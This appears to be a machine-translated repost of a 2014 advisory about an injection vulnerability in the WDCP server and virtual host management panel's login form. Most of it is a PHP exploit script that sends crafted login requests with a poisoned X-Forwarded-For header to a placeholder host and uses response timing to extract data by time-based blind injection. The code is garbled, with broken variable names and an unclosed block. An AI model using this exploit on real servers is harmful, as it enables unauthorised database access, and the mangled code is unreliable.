Date: 2014-05-13 | Source: Great Doll | Life Injection Point | 287 people on lookers
WDCP Server/Virtual Host management system landing box Injection vulnerability.
passwd field There is an injection risk, the selection limit character length is 30. I think Daniel can get around.
The following is a script for exploiting vulnerabilities released by the Great Doll
<?php
$id =$_get["id"];
$id 2=$_get["Id2"];
$post _data = ' username=admin&passwd=bbbbbb\&submit_login=aaaassss ';
$url = ' http://xxx:8080/';
$starttime = time ();
$ch = Curl_init ();
curl_setopt ($ch, Curlopt_post, 1);
curl_setopt ($ch, Curlopt_url, $url);
curl_setopt ($ch, Curlopt_timeout, 3);
curl_setopt ($ch, Curlopt_httpheader, Array (' X-forwarded-for:, ('. $id. '), char (65), 1) #);
curl_setopt ($ch, Curlopt_postfields, $post _data);
Ob_start ();
Curl_exec ($ch);
$result = Ob_get_contents ();
Ob_end_clean ();
$endtime = time ();
if ($endtime-$starttime >=3) {
Exit ($id. "is". Chr ($id 2));
echo $result;
?>